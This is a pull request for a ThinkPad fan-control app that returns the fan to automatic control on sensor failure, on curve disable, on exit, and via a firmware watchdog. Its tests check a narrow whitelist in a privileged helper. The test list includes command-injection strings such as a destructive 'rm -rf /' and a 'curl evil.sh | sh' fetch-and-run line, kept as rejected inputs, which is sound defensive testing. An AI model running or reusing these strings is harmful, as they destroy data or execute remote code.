### PR TITLE
fix(fan): never leave the fan under manual control without a supervisor

### DIFF
--- a/src-tauri/src/fan_control.rs
+++ b/src-tauri/src/fan_control.rs
@@ -13,8 +13,12 @@ pub const POLKIT_RULE_PATH: &str = "/etc/polkit-1/rules.d/50-thinkutils.rules";
 pub const HELPER_SCRIPT: &str = r#"#!/bin/bash
 set -e
 FAN="/proc/acpi/ibm/fan"
+# Exact-match whitelist. "watchdog 30" is permitted because the firmware
+# watchdog can only ever return the fan to automatic control -- it is the
+# recovery path if this app dies while holding a manual level. No other
+# watchdog value is accepted, and enable/disable are deliberately absent.
 case "$1" in
-    "level auto"|"level full-speed"|"level 0"|"level 1"|"level 2"|"level 3"|"level 4"|"level 5"|"level 6"|"level 7")
+    "level auto"|"level full-speed"|"level 0"|"level 1"|"level 2"|"level 3"|"level 4"|"level 5"|"level 6"|"level 7"|"watchdog 30")
         echo "$1" > "$FAN"
         ;;
     *)
@@ -23,6 +27,11 @@ case "$1" in
         ;;
 esac
 "#;
+
+/// Watchdog timeout, in seconds, that the helper is willing to arm.
+///
+/// Must stay in sync with the literal in HELPER_SCRIPT above; a test asserts it.
+pub const FAN_WATCHDOG_SECS: u32 = 30;
 
 /// Polkit rule that only allows the dedicated helper script without password.
 /// Much tighter than allowing arbitrary bash execution.
@@ -455,7 +464,6 @@ commands:\twatchdog <timeout> (0 disables, timeout is 0-120)
             "level -1",
             "enable",
             "disable",
-            "watchdog 0",
             "level auto; rm -rf /",
             "level auto && curl evil.sh | sh",
             "level $(id)",
@@ -477,6 +485,36 @@ commands:\twatchdog <timeout> (0 disables, timeout is 0-120)
             );
             assert!(!out.status.success(), "helper exited 0 for {:?}", p);
         }
+    }
+
+    /// The watchdog is the recovery path when this app dies holding a manual
+    /// level, so exactly one value is permitted -- and only that value.
+    #[test]
+    fn helper_accepts_only_the_one_watchdog_value() {
+        let out = run_helper(&format!("watchdog {}", FAN_WATCHDOG_SECS));
+        assert!(
+            !String::from_utf8_lossy(&out.stderr).contains("Invalid command"),
+            "helper must accept the watchdog arm command"
+        );
+        for bad in ["watchdog 0", "watchdog 1", "watchdog 120", "watchdog"] {
+            let out = run_helper(bad);
+            assert!(
+                String::from_utf8_lossy(&out.stderr).contains("Invalid command"),
+                "helper must reject {:?}",
+                bad
+            );
+        }
+    }
+
+    /// HELPER_SCRIPT hardcodes the timeout in a bash case arm, so a change to
+    /// the constant alone would silently stop the watchdog from ever arming.
+    #[test]
+    fn watchdog_constant_matches_helper_script() {
+        assert!(
+            HELPER_SCRIPT.contains(&format!("watchdog {}", FAN_WATCHDOG_SECS)),
+            "FAN_WATCHDOG_SECS ({}) has no matching arm in HELPER_SCRIPT",
+            FAN_WATCHDOG_SECS
+        );
     }
 
     /// Complements the above: the whitelist must not be so tight that legitimate

--- a/src-tauri/src/fan_curve.rs
+++ b/src-tauri/src/fan_curve.rs
@@ -212,20 +212,84 @@ fn get_cpu_temperature() -> Result<i32, String> {
 
 const HELPER_PATH: &str = "/usr/local/bin/thinkutils-fan-control";
 
+/// How long the firmware watchdog waits before forcing the fan back to auto.
+///
+/// Shared with the helper script's whitelist, which only accepts this exact
+/// value. thinkpad_acpi's watchdog is one-shot and only rearms when it receives
+/// a fan command, so it is re-armed on every level change rather than once.
+use crate::fan_control::FAN_WATCHDOG_SECS;
+
+/// Hand the fan back to firmware control.
+///
+/// Called whenever this task stops steering the fan for any reason: curve
+/// disabled, sensors unreadable, or app shutdown. Modelled on fancontrol, which
+/// treats every read failure as a reason to restore rather than to hold the last
+/// value — holding is what leaves a fan stopped under load.
+async fn restore_fan_to_auto() {
+    match write_fan_command("level auto").await {
+        Ok(_) => println!("[Fan Curve] Fan returned to automatic control"),
+        Err(e) => eprintln!("[Fan Curve] FAILED to restore fan to auto: {}", e),
+    }
+}
+
+/// Arm the firmware watchdog so the fan reverts to auto if this process dies.
+///
+/// Best-effort: an install whose helper predates watchdog support will reject
+/// the command, and a failure here must not stop the curve from running.
+async fn arm_fan_watchdog() {
+    let _ = write_fan_command(&format!("watchdog {}", FAN_WATCHDOG_SECS)).await;
+}
+
+/// Synchronous counterpart to [`restore_fan_to_auto`], for the app exit handler.
+///
+/// Runs unconditionally on shutdown: once this process is gone nothing is left
+/// to manage the fan, so handing it back to the firmware is always the right
+/// end state. Writing `level auto` when the fan is already automatic is a no-op.
+pub fn restore_fan_to_auto_blocking() {
+    use std::fs;
+    use std::io::Write;
+
+    if let Ok(mut file) = fs::OpenOptions::new().write(true).open("/proc/acpi/ibm/fan") {
+        if file.write_all(b"level auto").is_ok() {
+            println!("[Fan Curve] Fan returned to automatic control on exit");
+            return;
+        }
+    }
+
+    if std::path::Path::new(HELPER_PATH).exists() {
+        match std::process::Command::new("pkexec")
+            .arg(HELPER_PATH)
+            .arg("level auto")
+            .output()
+        {
+            Ok(o) if o.status.success() => {
+                println!("[Fan Curve] Fan returned to automatic control on exit");
+            }
+            _ => eprintln!("[Fan Curve] Could not restore fan to auto on exit"),
+        }
+    }
+}
+
 /// Set fan speed with pkexec fallback using the dedicated helper script.
 /// Only attempts pkexec if the helper and polkit rule are both installed
 /// (guaranteeing passwordless operation for the background task).
 async fn set_fan_speed_internal(level: i32) -> Result<(), String> {
-    use std::fs;
-    use std::io::Write;
-
-    let fan_level_path = "/proc/acpi/ibm/fan";
-
-    let command = if level >= 0 && level <= 7 {
+    let command = if (0..=7).contains(&level) {
         format!("level {}", level)
     } else {
         return Err("Invalid fan level".to_string());
     };
+
+    write_fan_command(&command).await
+}
+
+/// Write a single command to /proc/acpi/ibm/fan, elevating via the helper when
+/// a direct write is not permitted.
+async fn write_fan_command(command: &str) -> Result<(), String> {
+    use std::fs;
+    use std::io::Write;
+
+    let fan_level_path = "/proc/acpi/ibm/fan";
 
     // Try direct write first
     if let Ok(mut file) = fs::OpenOptions::new().write(true).open(fan_level_path) {
@@ -242,7 +306,7 @@ async fn set_fan_speed_internal(level: i32) -> Result<(), String> {
 
     let output = tokio::process::Command::new("pkexec")
         .arg(HELPER_PATH)
-        .arg(&command)
+        .arg(command)
         .output()
         .await
         .map_err(|e| format!("Failed to execute helper: {}", e))?;
@@ -276,6 +340,12 @@ pub async fn fan_curve_background_task(app: AppHandle) {
         };
 
         if !config.enabled {
+            // Hand the fan back rather than leaving it wherever the curve last
+            // put it. Turning the curve off used to strand the fan at its last
+            // manual level indefinitely.
+            if last_level.is_some() {
+                restore_fan_to_auto().await;
+            }
             last_level = None;
             permission_error_reported = false;
             continue;
@@ -288,6 +358,23 @@ pub async fn fan_curve_background_task(app: AppHandle) {
                 error_count += 1;
                 if error_count <= MAX_ERRORS {
                     eprintln!("[Fan Curve] Failed to read temperature: {}", e);
+                }
+
+                // Blind and still steering the fan is the dangerous state: if the
+                // curve is holding a low level and load rises, nothing will raise
+                // it. Give the fan back to the firmware, which can still see the
+                // sensors we cannot.
+                if last_level.is_some() {
+                    eprintln!("[Fan Curve] Temperature unreadable — returning fan to auto");
+                    restore_fan_to_auto().await;
+                    last_level = None;
+                    let _ = app.emit_to(
+                        "main",
+                        "fan-curve-error",
+                        serde_json::json!({
+                            "error": "Temperature sensors unreadable. Fan returned to automatic control.",
+                        }),
+                    );
                 }
                 continue;
             }
@@ -305,6 +392,7 @@ pub async fn fan_curve_background_task(app: AppHandle) {
                     println!("[Fan Curve] Temp: {}°C -> Fan Level: {}", temp, target_level);
                     last_level = Some(target_level);
                     permission_error_reported = false;
+                    arm_fan_watchdog().await;
                 }
                 Err(e) => {
                     eprintln!("[Fan Curve] Failed to set fan speed: {}", e);

--- a/src-tauri/src/lib.rs
+++ b/src-tauri/src/lib.rs
@@ -220,6 +220,14 @@ pub fn run() {
             mcp::start_mcp_server,
             mcp::stop_mcp_server,
         ])
-        .run(tauri::generate_context!())
-        .expect("error while running tauri application");
+        .build(tauri::generate_context!())
+        .expect("error while running tauri application")
+        .run(|_app, event| {
+            // Never exit leaving the fan under manual control. The firmware
+            // watchdog is the backstop for a hard kill, but on a clean exit we
+            // hand the fan back explicitly and immediately.
+            if let tauri::RunEvent::ExitRequested { .. } | tauri::RunEvent::Exit = event {
+                fan_curve::restore_fan_to_auto_blocking();
+            }
+        });
 }


### PR DESCRIPTION
The fan curve could strand the fan at a manual level with nothing left to recover it. On a laptop that's a thermal risk, not a cosmetic bug.

Found while researching multi-fan support; verified against the `thinkpad_acpi` driver source.

## Three paths that stranded the fan

**1. Sensor read failure** — the loop logged and `continue`d, holding `last_level` indefinitely. Blind *and still steering* is the dangerous state: if the curve was holding level 0–2 and load rose, nothing would raise it. Now reverts to auto and tells the frontend.

This mirrors `fancontrol`, which treats any read failure as a reason to restore rather than to hold the last value.

**2. Curve disabled** — resetting `last_level` left the hardware wherever the curve had put it. Now restores first.

**3. App exit** — nothing restored on shutdown. Now handled in Tauri's run loop on `ExitRequested`/`Exit`. Unconditional: once the process is gone nothing manages the fan, so automatic is always the right end state, and `level auto` on an already-automatic fan is a no-op.

Worth knowing: **`thinkpad_acpi`'s own `fan_exit()` does not restore auto** — the driver leaves the fan wherever userspace left it. Nothing below us was going to clean this up.

## Hard kill

None of the above run on SIGKILL, so the firmware watchdog is the backstop. It's armed on each level change — thinkpad_acpi's watchdog is one-shot and **only rearms on a fan command**, so arming once at start would let it expire during a steady-state period.

That required widening the helper whitelist, which is a security boundary. So it's widened by **exactly one literal**: `watchdog 30`. The watchdog can only ever return the fan to auto, never stop it, and no other value is accepted — `watchdog 0` (which *disables* it) is explicitly rejected.

Existing installs carry the older helper and will have the arm rejected. That's best-effort by design; the other three paths still work.

## Tests

- `helper_accepts_only_the_one_watchdog_value` — accepts `watchdog 30`, rejects `0`/`1`/`120`/bare
- `watchdog_constant_matches_helper_script` — the timeout is hardcoded in a bash `case` arm, so changing the Rust constant alone would silently stop the watchdog ever arming

Suite: 35 → 37.